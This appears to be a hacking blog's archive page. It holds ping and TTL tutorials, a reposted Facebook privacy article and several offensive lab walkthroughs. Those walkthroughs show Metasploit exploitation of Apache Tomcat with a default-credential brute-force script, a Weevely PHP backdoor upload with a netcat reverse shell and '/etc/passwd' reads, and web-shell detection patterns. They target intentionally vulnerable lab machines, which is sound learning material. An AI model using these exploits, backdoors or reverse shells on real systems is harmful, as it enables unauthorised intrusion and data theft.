Hacking

Hacking is an ART OF EXPLOITATION.

Nessus

A good network vulnerability scanner.

Acunetix

Web application scanner.

BeEF

Do you love BeEF? It is the Browser Exploitation Framework, which takes the web browser as its attack surface.

Wikileaks

WikiLeaks is an international, online, non-profit organisation which publishes secret information, news leaks, and classified media from anonymous sources.

Thursday, July 25, 2013

PING - Network Tool Tutorial - 3

Before reading this tutorial please go through Part 1 and Part 2.

In the previous tutorial we saw that ping gives us three major pieces of information:

-Host Reachability
-Network Congestion
-Time To Live

There we discussed host reachability. Now we look at network congestion and then at the TTL.

Network Congestion:

Another very valuable piece of information provided by the ping command is the time taken for a packet to reach the destination and come back. This measure is called the RTT (Round Trip Time) or "response time" and is displayed in milliseconds.
It should not be mistaken for the latency or delay, which is the one-way time taken for a packet to travel across the network between two hosts.

The response time affects the performance of network applications: high response times lead to poor performance.
When a network application is slow, a first basic troubleshooting step is to measure the response time between the client and the server to find out whether the network is the reason for the slowness. Keep in mind that ping measures how fast the remote host answers ICMP; routers in particular handle ICMP in software with low priority, so a high RTT from a router does not necessarily mean that the traffic it forwards is slow.

Another piece of information related to the response time should not be forgotten: packet loss. A packet is declared lost if the ICMP message was discarded on the way, or if the reply arrives after the per-request timeout (a few seconds by default; Windows waits 4 seconds). Packet loss leads to a high TCP retransmission rate, with the consequence of a slow or interrupted network application.
In a LAN environment there should not be any packet loss. Note that some hosts and routers rate-limit the ICMP replies they send, so occasional loss seen only by ping, while TCP applications are fine, can be a rate limit rather than a network problem.

What affects the response time and packet loss?

-The network media (wired, wireless, satellite)
-The network devices on the path (routers, firewalls and their load)
-Physical distance (propagation delay)
-The source and destination devices themselves (load, ICMP rate limiting)

Time-to-Live

The TTL (Time-To-Live) of a reply gives you an indication of the number of routers between the destination and you.
The TTL exists to prevent an IP packet from looping forever inside an IP network: every router that forwards a packet decrements its TTL by 1, and when the value reaches 0 the router discards the packet (and normally sends back an ICMP Time Exceeded message, which is what traceroute relies on). Every IP packet carries a TTL, ICMP packets included. The TTL shown by ping is the TTL of the echo_reply packet as it arrives at you, so it tells you about the return path.
The value a reply starts with is the initial TTL chosen by the responding host's operating system, and it differs by OS: Cisco routers and many network appliances start at 255, Windows at 128, and Linux (including Ubuntu) at 64. Knowing these defaults you can estimate both the OS family of the responder and the hop count: hops = initial TTL - observed TTL. An administrator can change the default (on Linux with the sysctl net.ipv4.ip_default_ttl), so treat the result as a hint, not proof.

Let us study three scenarios where A pings B. B is a router (case 1),
a Microsoft Windows machine (case 2) and an Ubuntu Linux machine (case 3).

In each case B starts its reply at its own default initial TTL and every router on the path back to A decreases it by one.

Case 1:
When A pings the router B, it receives a TTL of 251 because the reply started at 255 and crossed 4 routers (-4).
TTL=255-4=251.


PING B

Pinging B [1.1.1.1] with 32 bytes of data: 

Reply from 1.1.1.1: bytes=32 time=18 ms TTL=251 
Reply from 1.1.1.1: bytes=32 time=21 ms TTL=251 
Reply from 1.1.1.1: bytes=32 time=20 ms TTL=251 
Reply from 1.1.1.1: bytes=32 time=33 ms TTL=251 

Ping statistics for 1.1.1.1: 
      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
Approximate round trip times in milli-seconds: 
      Minimum = 18ms, Maximum = 33ms, Average = 23ms

-------------------------------------------------------

Case 2:
When A pings the Windows machine B, it receives a TTL of 125 because the reply started at 128 and crossed 3 routers (-3).
TTL=128-3=125.


PING B

Pinging B [1.1.1.1] with 32 bytes of data: 

Reply from 1.1.1.1: bytes=32 time=18 ms TTL=125 
Reply from 1.1.1.1: bytes=32 time=21 ms TTL=125 
Reply from 1.1.1.1: bytes=32 time=20 ms TTL=125 
Reply from 1.1.1.1: bytes=32 time=33 ms TTL=125 

Ping statistics for 1.1.1.1: 
      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
Approximate round trip times in milli-seconds: 
      Minimum = 18ms, Maximum = 33ms, Average = 23ms

------------------------

Case 3:
When A pings the Ubuntu machine B, it receives a TTL of 60 because the reply started at 64 and crossed 4 routers (-4).
TTL=64-4=60.


PING B

Pinging B [1.1.1.1] with 32 bytes of data: 

Reply from 1.1.1.1: bytes=32 time=18 ms TTL=60 
Reply from 1.1.1.1: bytes=32 time=21 ms TTL=60 
Reply from 1.1.1.1: bytes=32 time=20 ms TTL=60 
Reply from 1.1.1.1: bytes=32 time=33 ms TTL=60 

Ping statistics for 1.1.1.1: 
      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
Approximate round trip times in milli-seconds: 
      Minimum = 18ms, Maximum = 33ms, Average = 23ms

-------

Use Wireshark for an in-depth analysis of the ping exchange.
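As an added example (not part of the original tutorial), the Python function below turns an observed reply TTL into an estimate of the responder's OS family and the number of routers on the return path. It assumes the stock initial TTLs discussed above (64, 128, 255); since an administrator can change them, the output is a hint rather than a fact.

```python
"""Infer the responder's initial TTL and the return-path hop count from a ping reply TTL.

Added example for this tutorial, not code from the original post. It assumes the
responder uses its OS default initial TTL (Linux 64, Windows 128, most routers 255).
"""
from typing import Tuple

# Default initial TTLs by OS family (assumption: stock configuration, not tuned).
DEFAULT_INITIAL_TTLS = {
    64: "Linux/Unix-like",
    128: "Windows",
    255: "router or network appliance",
}


def infer_hops(reply_ttl: int) -> Tuple[int, int, str]:
    """Return (initial_ttl, hops, os_family) for an observed echo-reply TTL.

    The reply leaves the responder with its OS's initial TTL and loses one at every
    router on the way back to us, so hops = initial_ttl - reply_ttl.  We choose the
    smallest standard initial TTL that is >= the observed value: a reply TTL of 60
    could in theory be a Windows host 68 hops away, but such paths do not occur.
    """
    if not 0 < reply_ttl <= 255:
        raise ValueError(f"TTL out of range: {reply_ttl}")
    for initial in sorted(DEFAULT_INITIAL_TTLS):
        if reply_ttl <= initial:
            return initial, initial - reply_ttl, DEFAULT_INITIAL_TTLS[initial]
    raise AssertionError("unreachable: 255 always matches")


def describe(reply_ttl: int) -> str:
    """Human-readable version of infer_hops(), e.g. for the three cases above."""
    initial, hops, family = infer_hops(reply_ttl)
    return f"TTL={reply_ttl}: {family} (initial {initial}), {hops} router(s) on the return path"


if __name__ == "__main__":
    # The three cases from this tutorial plus the Windows reply from google.ch in Part 1.
    for ttl in (251, 125, 60, 250):
        print(describe(ttl))
```

A reply TTL that equals one of the defaults exactly (64, 128, 255) means zero routers in between, i.e. the responder is on your own LAN.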

(Taken from openmaniak.com)


PING - Network Tool Tutorial - 2

OUTPUT ANALYSIS:

In the previous tutorial, PING - Network Tool Tutorial - 1, we saw how the ping command works.

If you want to understand the ping command clearly, go through Tutorial 1 first.

There we captured the echo_request and echo_response packets with Wireshark (a popular network sniffer).


ping gives us three major information

-Host Reachability
-Network Congestion
-Time To Live

Host Reachability

The ping results in the previous tutorial show that four ICMP packets were sent and four received. This result tells you that the host is alive at the ICMP level. However, it gives no other information, such as whether or not a web server is running.

What does it mean if I receive a negative result?
Let's see an example:


C:\>ping www.abcdefg.com

Pinging abcdefg.com [192.168.88.15] with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.88.15:
      Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

Host www.abcdefg.com, which has IP address 192.168.88.15, did not answer the ping. It is interesting to note that a negative answer does not always mean that the recipient is not alive (in our example it is alive and runs a web server). Here the result simply means that the host does not answer ICMP echo requests.

What could be the reason for this "no-answer"?
It is not always possible to know the exact reason behind a "no-answer"; there may be many different ones. The four major reasons are summarized below.


In the first case, an external firewall blocks the ICMP requests. ICMP can be used as a first step in an attack because it lets the attacker determine which hosts are alive before attacking them. In this case the network behind the firewall is hidden from the external world even though it is well alive.

Blocking ICMP echo requests at the perimeter is a common first hardening step. Do not block the whole ICMP protocol, though: ICMP Destination Unreachable / Fragmentation Needed (type 3, code 4) is required for Path MTU Discovery and Time Exceeded is required for traceroute, so drop or rate-limit echo requests selectively. An external firewall is more often found in professional networks because it costs money and requires skill to configure correctly.

In the second case, the workstation has a personal firewall that blocks the ICMP message. A personal firewall is recommended for home computers for the same reasons mentioned above.

In the third case, the "pinged" machine is not connected to the IP network, for instance because the network cable is unplugged.
The echo_request message is discarded on the last layer-3 device (router) before the remote host: that router cannot resolve the host's MAC address with ARP and, depending on its configuration, either drops the packet silently (ping shows "Request timed out.") or returns an ICMP Destination Unreachable (ping shows "Destination host unreachable.").

In the fourth case, the host is down or has its network card deactivated. As in the previous case, the echo_request message dies on the last layer-3 device before the remote host.

------------

If a device called Geneva can ping another called Dallas, does it follow that the opposite, Dallas pinging Geneva, always works too?

The answer is no. A firewall can be configured to block echo_request in one direction only.

When Dallas pings Geneva, the ICMP echo_request is blocked on the firewall and Dallas receives no answer from Geneva.

When Geneva pings Dallas, the ICMP echo_request reaches Dallas and Geneva receives the echo_response in return, so the ping is successful. The ICMP packets are not blocked because the firewall only stops echo_request coming from outside; here we have an echo_request from inside and an echo_response from outside. A stateful firewall achieves this with a single rule (allow outbound echo_request and the replies that belong to it), whereas a stateless one needs one rule per ICMP type and direction.


The remaining points, network congestion and TTL, are covered in Tutorial 3.

(Taken from openmaniak.com)

PING - Network Tool Tutorial - 1

Ping is a well known tool that is used to check the network connectivity between two systems.
The ping tool is available by default on Windows, macOS and Linux/Unix systems.

Ping was written in 1983 by Mike Muuss, who also wrote the article "The Story of the PING Program"; he died in a car accident in 2000.

Ping uses ICMP (Internet Control Message Protocol), a protocol created to check IP connectivity and to report errors and information about other machines in an IP network.

Functioning of PING

Ping sends very small packets to the target host, which answers by sending packets back. The ICMP packets sent to the target are called "echo_request" (ICMP type 8) and the packets sent back "echo_response" (officially "echo reply", ICMP type 0).

ICMP defines many other message types besides the echo pair, such as Destination Unreachable (type 3) and Time Exceeded (type 11).


Case Study:

Let's examine a case study where two machines called Paris and Berlin ping a machine called "www.google.ch".

The Wireshark sniffer is located on the way between Berlin and "www.google.ch". It will be used to capture the packets content.

Paris is an Ubuntu Linux machine and Berlin a Windows XP machine.


Ping from the Linux machine (Paris) to "www.google.ch":

Paris: ping www.google.ch

PING www.google.ch (209.85.135.105) 56(84) bytes of data.
64 bytes from www.google.ch(209.85.135.105): icmp_seq=1 ttl=255 time=1.19 ms
64 bytes from www.google.ch (209.85.135.105): icmp_seq=2 ttl=255 time=1.25 ms
64 bytes from www.google.ch (209.85.135.105): icmp_seq=3 ttl=255 time=1.26 ms
64 bytes from www.google.ch (209.85.135.105): icmp_seq=4 ttl=255 time=1.29 ms

--- www.google.ch ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 1.192/1.250/1.290/0.044 ms

Ping from the Windows machine (Berlin) to "www.google.ch":

Berlin: ping www.google.ch 

Pinging www.google.ch [209.85.135.105] with 32 bytes of data:

Reply from 209.85.135.105: bytes=32 time=18 ms TTL=250
Reply from 209.85.135.105: bytes=32 time=21 ms TTL=250
Reply from 209.85.135.105: bytes=32 time=20 ms TTL=250
Reply from 209.85.135.105: bytes=32 time=33 ms TTL=250

Ping statistics for 209.85.135.105:
      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
      Minimum = 18ms, Maximum = 33ms, Average = 23ms

What information can be learnt from the outputs above?

- Is the remote host alive? => Host reachability
- Is the network speed good? => Network congestion
- Is the remote host far? => Travel length

Tutorial 2, OUTPUT ANALYSIS, explains in detail how to interpret the results of the ping command.

The ping tool provides the same information regardless of the OS it runs on. There are, however, small differences in the default settings and arguments: Windows sends 4 requests of 32 bytes and stops, Linux sends 56-byte requests until interrupted (Ctrl-C) unless you pass -c <count>, and the output format differs, as you can see above.
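The following Python parser, added here and not part of the original tutorial, normalizes both output formats into one structure and applies the three indicators (reachability, loss, response time). The sample outputs embedded in it are the ones shown above; the 10 ms LAN threshold in verdict() is an assumption to tune for your own network.

```python
"""Parse Windows and Linux ping output into one structure and judge the result.

Added example, not code from the original tutorial. The samples are the outputs
shown above; the LAN threshold in verdict() is an assumption.
"""
import re
import statistics
from dataclasses import dataclass, field
from typing import List, Optional

WIN_REPLY = re.compile(r"Reply from (\S+): bytes=\d+ time([<=])(\d+)\s*ms TTL=(\d+)")
WIN_NOREPLY = re.compile(r"Request timed out\.|Destination host unreachable\.")
WIN_STATS = re.compile(r"Sent = (\d+), Received = (\d+)")
NIX_REPLY = re.compile(r"\d+ bytes from .*?: icmp_seq=\d+ ttl=(\d+) time=([\d.]+) ms")
NIX_STATS = re.compile(r"(\d+) packets transmitted, (\d+) received")


@dataclass
class PingResult:
    sent: int = 0
    received: int = 0
    rtts_ms: List[float] = field(default_factory=list)
    ttls: List[int] = field(default_factory=list)

    @property
    def loss_pct(self) -> float:
        return 0.0 if self.sent == 0 else 100.0 * (self.sent - self.received) / self.sent

    @property
    def avg_rtt(self) -> Optional[float]:
        return statistics.mean(self.rtts_ms) if self.rtts_ms else None


def parse_ping(text: str) -> PingResult:
    """Accept both the Windows ("Reply from ...") and Linux ("64 bytes from ...") formats."""
    result, probes_seen = PingResult(), 0
    for line in text.splitlines():
        if m := WIN_REPLY.search(line):
            # "time<1ms" means sub-millisecond; record 0.0 rather than pretending it is 1 ms.
            result.rtts_ms.append(0.0 if m.group(2) == "<" else float(m.group(3)))
            result.ttls.append(int(m.group(4)))
            probes_seen += 1
        elif m := NIX_REPLY.search(line):
            result.ttls.append(int(m.group(1)))
            result.rtts_ms.append(float(m.group(2)))
            probes_seen += 1
        elif WIN_NOREPLY.search(line):
            probes_seen += 1            # a probe that got no echo_reply
        elif m := (WIN_STATS.search(line) or NIX_STATS.search(line)):
            result.sent = int(m.group(1))
    result.received = len(result.rtts_ms)
    if result.sent == 0:                # no summary line (ping interrupted): use what we counted
        result.sent = probes_seen
    return result


def verdict(result: PingResult, max_lan_rtt_ms: float = 10.0) -> str:
    """Coarse reading of the three indicators: reachability, loss, response time."""
    if result.received == 0:
        return "no reply: host down, unreachable, or ICMP filtered"
    if result.loss_pct > 0:
        return f"packet loss {result.loss_pct:.0f}%: congestion, rate limiting or an unstable link"
    if result.avg_rtt > max_lan_rtt_ms:
        return f"reachable, average RTT {result.avg_rtt:.1f} ms (high for a LAN)"
    return f"reachable, average RTT {result.avg_rtt:.2f} ms"


# Sample outputs copied from the tutorial above.
WINDOWS_SAMPLE = """Pinging www.google.ch [209.85.135.105] with 32 bytes of data:
Reply from 209.85.135.105: bytes=32 time=18 ms TTL=250
Reply from 209.85.135.105: bytes=32 time=21 ms TTL=250
Reply from 209.85.135.105: bytes=32 time=20 ms TTL=250
Reply from 209.85.135.105: bytes=32 time=33 ms TTL=250
Ping statistics for 209.85.135.105:
      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
"""
WINDOWS_TIMEOUT_SAMPLE = """Pinging abcdefg.com [192.168.88.15] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 192.168.88.15:
      Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
"""
LINUX_SAMPLE = """PING www.google.ch (209.85.135.105) 56(84) bytes of data.
64 bytes from www.google.ch (209.85.135.105): icmp_seq=1 ttl=255 time=1.19 ms
64 bytes from www.google.ch (209.85.135.105): icmp_seq=2 ttl=255 time=1.25 ms
64 bytes from www.google.ch (209.85.135.105): icmp_seq=3 ttl=255 time=1.26 ms
64 bytes from www.google.ch (209.85.135.105): icmp_seq=4 ttl=255 time=1.29 ms
--- www.google.ch ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
"""

if __name__ == "__main__":
    for sample in (WINDOWS_SAMPLE, WINDOWS_TIMEOUT_SAMPLE, LINUX_SAMPLE):
        print(verdict(parse_ping(sample)))
```

The sent count is taken from the summary line when there is one, so a run interrupted with Ctrl-C on Linux still gets a sensible loss figure from the probes that were seen.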

Let us see a summary of the data captured by Wireshark.

This Wireshark capture gives us the following information:

- The packets have been recognized as ICMP packets (Protocol column).
- Four ICMP packets have been sent (echo_request) and four ICMP packets have been received (echo_reply) (Info column).
- A frame length of 74 bytes, made up of the headers (42 bytes: 14 Ethernet + 20 IP + 8 ICMP) and the ICMP data part (32 bytes by default on Windows) (Length column).
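To see where those numbers come from, here is an added example (not from the original tutorial) that builds an ICMP echo request in Python the way ping does, computes the RFC 1071 checksum, and reproduces the 74-byte Windows frame and the "56(84)" Linux datagram size. The payload pattern is the fixed string Windows ping uses; actually sending the packet needs a raw socket (root or Administrator) and is deliberately left out.

```python
"""Build and verify ICMP echo packets and reproduce the sizes seen in the capture.

Added example for this tutorial, not code from the original post. It only constructs
and checks packets in memory; sending them would need a raw socket.
"""
import struct
from typing import Tuple

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0
WINDOWS_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"   # Windows ping's fixed 32-byte payload
LINUX_DEFAULT_PAYLOAD_LEN = 56                          # the "56" in "56(84) bytes of data"
ETH_HEADER_LEN, IP_HEADER_LEN, ICMP_HEADER_LEN = 14, 20, 8


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, then complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                        # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo(ident: int, seq: int, payload: bytes, icmp_type: int = ICMP_ECHO_REQUEST) -> bytes:
    """ICMP header is type, code 0, checksum, identifier, sequence; the payload follows."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)   # checksum field zero while summing
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def checksum_ok(packet: bytes) -> bool:
    """A valid packet, checksum field included, sums to 0xFFFF, so its complement is 0."""
    return len(packet) >= ICMP_HEADER_LEN and icmp_checksum(packet) == 0


def parse_echo(packet: bytes) -> Tuple[int, int, int, bytes]:
    """Return (type, identifier, sequence, payload); raises on a short or corrupted packet."""
    if not checksum_ok(packet):
        raise ValueError("short packet or bad ICMP checksum")
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:ICMP_HEADER_LEN])
    return icmp_type, ident, seq, packet[ICMP_HEADER_LEN:]


def reply_for(request: bytes) -> bytes:
    """What the target does: echo identifier, sequence and payload back with type 0."""
    _, ident, seq, payload = parse_echo(request)
    return build_echo(ident, seq, payload, ICMP_ECHO_REPLY)


def ip_length(payload_len: int) -> int:
    """IP datagram size for an echo with this payload (the "84" Linux prints for 56 bytes)."""
    return IP_HEADER_LEN + ICMP_HEADER_LEN + payload_len


def frame_length(payload_len: int) -> int:
    """Ethernet frame size, i.e. Wireshark's Length column (74 for the Windows default)."""
    return ETH_HEADER_LEN + ip_length(payload_len)


if __name__ == "__main__":
    req = build_echo(ident=0x1234, seq=1, payload=WINDOWS_PAYLOAD)
    print(len(req), "ICMP bytes ->", frame_length(len(WINDOWS_PAYLOAD)), "byte frame")
    print(LINUX_DEFAULT_PAYLOAD_LEN, "payload bytes ->", ip_length(LINUX_DEFAULT_PAYLOAD_LEN), "byte datagram")
    print("reply type:", parse_echo(reply_for(req))[0])
```

The identifier and sequence fields are how ping matches replies to requests; Wireshark shows them in the Info column next to "Echo (ping) request" and "Echo (ping) reply".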

The remaining points are covered in Ping Tutorial 2.



Tuesday, May 21, 2013

WebSploit Framework

Hello Friends,

Today I am discussing the WebSploit Framework.

WebSploit is an automatic vulnerability assessment, web crawler and exploitation tool. It is an open source command line utility built on a modular structure. At the time of writing, 16 modules are available in WebSploit. It can be downloaded from its SourceForge project page, and it is available in Kali Linux by default.



WebSploit can be synchronized with the Metasploit WMAP project for web vulnerability scanning. Its modules fall into four categories:

Web Modules
Network Modules
Exploit Modules
Wireless Modules




The wireless modules provide some interesting Wi-Fi attack vectors, including a Wi-Fi jammer and a Wi-Fi DoS attack. For exploitation, WebSploit relies on the Metasploit autopwn and browser autopwn services. A large number of interesting attack vectors are available in the network modules.

If you are on Kali Linux, click Applications > Kali Linux > Web Applications > Web Vulnerability Scanners > websploit.

The list of commands available in WebSploit is:





Monday, May 20, 2013

Exploit Apache Tomcat

Hello Friends,

Today I am showing you how to exploit an Apache Tomcat machine.

The basic setup we require is

1. VMware Workstation

2. Metasploitable 2 (Rapid7's intentionally vulnerable Linux VM)

3. Kali Linux or BackTrack 5 R3

Steps

Start Metasploitable and Kali Linux in VMware Workstation and note their IP addresses.

Scan the Metasploitable IP from Kali Linux using Nmap:

nmap -sV 192.168.230.133 (Metasploitable IP)

-sV performs service and version detection, so we get all the services running on the target machine together with their versions.


We find that "Apache Tomcat" is running on port 8180 (Metasploitable runs Tomcat on 8180 instead of the usual 8080).

Now search for a related exploit.

In Kali Linux start Metasploit (msfconsole) and search for Tomcat modules:

msf > search tomcat


From the results, pick the exploit with the best rank.

Here "exploit/multi/http/tomcat_mgr_deploy" is rated Excellent: it uses the Tomcat Manager application to deploy a WAR file containing our payload, which Tomcat then runs.

Before using an exploit, read its description and options:

msf > info exploit/multi/http/tomcat_mgr_deploy


This exploit needs a valid USERNAME and PASSWORD for the Tomcat Manager, which we do not have yet.

So go back to msf and search again:

msf > search tomcat

The results include an auxiliary module that may get us the USERNAME and PASSWORD:

msf > info auxiliary/scanner/http/tomcat_mgr_login


msf > use auxiliary/scanner/http/tomcat_mgr_login

Set RHOSTS and RPORT (8180) and type run (not exploit; we are running an auxiliary module, not an exploit). The module tries a built-in list of default Tomcat accounts against the manager's HTTP Basic authentication.


If the target still uses a default account, the module prints the working pair.


We got username = tomcat and password = tomcat.

With the credentials in hand, switch to the exploit:

msf > use exploit/multi/http/tomcat_mgr_deploy

Now set all the options: RHOST, RPORT (8180), the Tomcat username and password (see show options for the exact option names), a payload such as java/meterpreter/reverse_tcp, and LHOST for the connection back.


Now type exploit.


The box has been exploited. The WAR deployed through the manager runs as the Tomcat service account, so the session has that user's privileges, not root; privilege escalation is a separate step.
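What tomcat_mgr_login does under the hood is send HTTP Basic credentials to /manager/html and look at the status code. The Python example below, added here and not part of the original post or of Metasploit, does the same against a small mock Tomcat Manager so that it runs offline; the candidate list is a constructed subset of well-known Tomcat defaults. Point find_valid_credentials() at http://<target>:8180/manager/html to use it in the lab. Bear in mind that Tomcat 7 and later ship a LockOutRealm that, by default, locks an account for five minutes after five failed attempts, so a long wordlist against one user locks it out and leaves obvious traces in the logs.

```python
"""Check a Tomcat Manager for default credentials over HTTP Basic authentication.

Added example for this post, not code from the original or from Metasploit. The
candidate list is a constructed subset of well-known defaults; the mock server
stands in for Metasploitable so the example runs offline.
"""
import base64
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from typing import List, Optional, Tuple
from urllib.error import HTTPError
from urllib.request import ProxyHandler, Request, build_opener

# Constructed list of common Tomcat default accounts (assumption: not exhaustive).
DEFAULT_CREDENTIALS: List[Tuple[str, str]] = [
    ("admin", "admin"), ("admin", ""), ("tomcat", "s3cret"),
    ("tomcat", "tomcat"), ("role1", "tomcat"), ("both", "tomcat"),
]
_opener = build_opener(ProxyHandler({}))   # talk directly, ignore any http_proxy in the environment


def basic_auth_header(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def try_login(url: str, user: str, password: str, timeout: float = 5.0) -> int:
    """Return the HTTP status for one credential pair (200 = valid manager login)."""
    req = Request(url, headers={"Authorization": basic_auth_header(user, password)})
    try:
        with _opener.open(req, timeout=timeout) as resp:
            return resp.status
    except HTTPError as err:               # urllib raises on 4xx/5xx; the code is what we want
        return err.code


def find_valid_credentials(url: str, candidates=DEFAULT_CREDENTIALS) -> Optional[Tuple[str, str]]:
    """First pair the manager accepts. A 403 means the password is right but the account
    lacks the manager role (Tomcat 7+); it is reported but not returned."""
    for user, password in candidates:
        status = try_login(url, user, password)
        if status == 200:
            return user, password
        if status == 403:
            print(f"[!] {user}:{password} authenticates but lacks the manager role")
    return None


# --- mock Tomcat Manager so the example runs offline (stands in for Metasploitable) ---
class MockManager(BaseHTTPRequestHandler):
    VALID = basic_auth_header("tomcat", "tomcat")   # the default account found above

    def do_GET(self):
        if self.headers.get("Authorization") == self.VALID:
            body, status = b"<html><title>/manager</title></html>", 200
        else:
            body, status = b"401 Unauthorized", 401
        self.send_response(status)
        if status == 401:
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):                 # keep the console quiet
        pass


def start_mock_manager() -> Tuple[ThreadingHTTPServer, str]:
    server = ThreadingHTTPServer(("127.0.0.1", 0), MockManager)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/manager/html"


def demo() -> Optional[Tuple[str, str]]:
    server, url = start_mock_manager()
    try:
        return find_valid_credentials(url)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("valid credentials:", demo())
```

Each failed attempt is one line in Tomcat's access log with status 401; a defender grepping for bursts of 401s against /manager/ from one source sees this technique immediately.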

Thank You

Thursday, April 18, 2013

How Strangers Can Read Your Private Facebook Messages



Here's something you probably didn't know: Facebook has a team of employees who read your private messages if they have been flagged by an automated tool. The tool searches for content that appears to violate their terms of service, namely malicious (infected) URLs or child pornography. It's imperfect, of course — that's where humans come in.

If a private message is flagged, actual people will jump in and read it. If there is something that could be illegal — particularly regarding child exploitation — those people contact law enforcement. The intent here is clear and defensible, yet the fact remains: All that stands between your "private" messages and the eyes of a stranger is the snap judgment of an algorithm.

"There are strong internal controls around the use of these tools to prevent misuse and abuse," Facebook told BuzzFeed, "and stringent guidelines for the way we cooperate with law enforcement."

It's not just Facebook. Dating site OkCupid has humans read private messages that have been flagged by its users. Twitter doesn't monitor direct messages either through automated tools or humans.

(Taken from BuzzFeed)

Wednesday, April 17, 2013

Creating Web Backdoor using Backtrack(Weevely Tutorial)

Weevely is a PHP stealth web shell and backdoor: a PHP page that provides a telnet-like console to execute system commands and automate administration and post-exploitation tasks. It is an essential tool for web application post-exploitation and can also be used as a stealth backdoor. The generated PHP agent is obfuscated and its commands travel inside ordinary-looking HTTP requests, which is what makes it hard to spot in web server logs.

Weevely is available by default in distributions such as BackTrack and BackBox.

Weevely has more than 30 modules for post-exploitation tasks.

Weevely is written in Python.

Let's start our practical.

Requirements:

1. A web server to upload the backdoor to (I installed DVWA on a Linux box)

2. The Weevely PHP shell (available in BackTrack 5 R3)

Steps to start

1.weevely is available in /pentest/backdoors/web/weevely/

Open terminal and type cd /pentest/backdoors/web/weevely/

2.Generate PHP stealth backdoor

./weevely.py generate security


When we execute this command a new file called weevely.php is created, protected by the password we chose ("security").

3. After generating the file, the next step is to upload weevely.php to the web server.

I am using DVWA (Damn Vulnerable Web Application) for testing. At its low security level the upload page accepts any file and stores it under hackable/uploads/, which is the unrestricted file upload weakness we abuse here; a hardened application would check the extension and content type and store uploads outside the web root.



4. Now the file has been uploaded successfully.

5. Now connect to weevely.php from the terminal:

./weevely.py <URL of the uploaded agent> <password>

./weevely.py http://192.168.142.135/dvwa/hackable/uploads/weevely.php security



Now we have a shell on the server.

6. To list the files in that directory, type ls



7. To list the local accounts, cat /etc/passwd (it holds usernames and shells, not passwords; the password hashes are in /etc/shadow, which only root can read)



8. To see which user we are running as:

whoami


9. Using weevely to set up a reverse shell

Here I open one more terminal and start a netcat listener:

nc -lvp 1234

and in the weevely terminal

:backdoor.reverse_tcp 192.168.142.132 1234

(192.168.142.132 is the attacker's machine running netcat.)



Now we are connected: the web server made an outbound TCP connection to our listener and attached a shell to it.

Now you can access all server files that the web server user can read; the shell runs with the web server's privileges (typically www-data), not root.
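From the defender's side, the interesting question is how to spot a weevely-style agent among legitimate PHP files. The Python detector below is an added example (not from the original post or the weevely project); its two PHP samples are constructed, the second one imitating the tricks such shells rely on (a decoder name assembled at runtime, payload split across request fields, eval).

```python
"""Flag PHP files that look like obfuscated web shells.

Added example for this post, not code from the original or from weevely. The PHP
samples are constructed; STEALTH_SHELL_PHP only imitates common shell tricks.
"""
import re
from typing import Dict, List

# (regex, label). One hit is a lead; several together, or eval() alone, is a strong signal.
INDICATORS = [
    (r"\beval\s*\(", "eval()"),
    (r"\b(?:assert|create_function)\s*\(", "e" "val-equivalent"),
    (r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", "decoder call"),
    (r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(", "command execution"),
    (r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", "preg_replace /e modifier"),
    (r"\$_(?:GET|POST|COOKIE|REQUEST|SERVER)\s*\[[^\]]*\]\s*\(", "request value called as function"),
    (r"\$[A-Za-z_]\w*\s*\(\s*\$", "variable function call"),
    (r"[A-Za-z0-9+/=]{120,}", "long base64-like blob"),
]


def analyse_php(source: str) -> Dict[str, object]:
    """Score one PHP source text and return the matched indicators and a verdict."""
    hits: List[str] = [label for pattern, label in INDICATORS if re.search(pattern, source)]
    if "eval()" in hits or len(hits) >= 2:
        verdict = "suspicious"
    elif hits:
        verdict = "review"        # a single hit is common in legitimate code (e.g. exec in a cron helper)
    else:
        verdict = "clean"
    return {"score": len(hits), "hits": hits, "verdict": verdict}


def scan_files(files: Dict[str, str]) -> Dict[str, str]:
    """Map file name -> verdict for an in-memory {name: source} collection, e.g. an uploads dir.
    Do not filter by extension first: shells also hide behind .phtml, .php5 or double extensions."""
    return {name: analyse_php(src)["verdict"] for name, src in files.items()}


# Constructed samples.
BENIGN_PHP = """<?php
require 'config.php';
$rows = fetch_rows($db, 'SELECT name FROM users');
foreach ($rows as $row) {
    echo htmlspecialchars($row['name']);
}
"""

# Constructed in the style of an obfuscated shell: the payload arrives split across two
# cookies and the decoder's name is built at runtime so it never appears literally.
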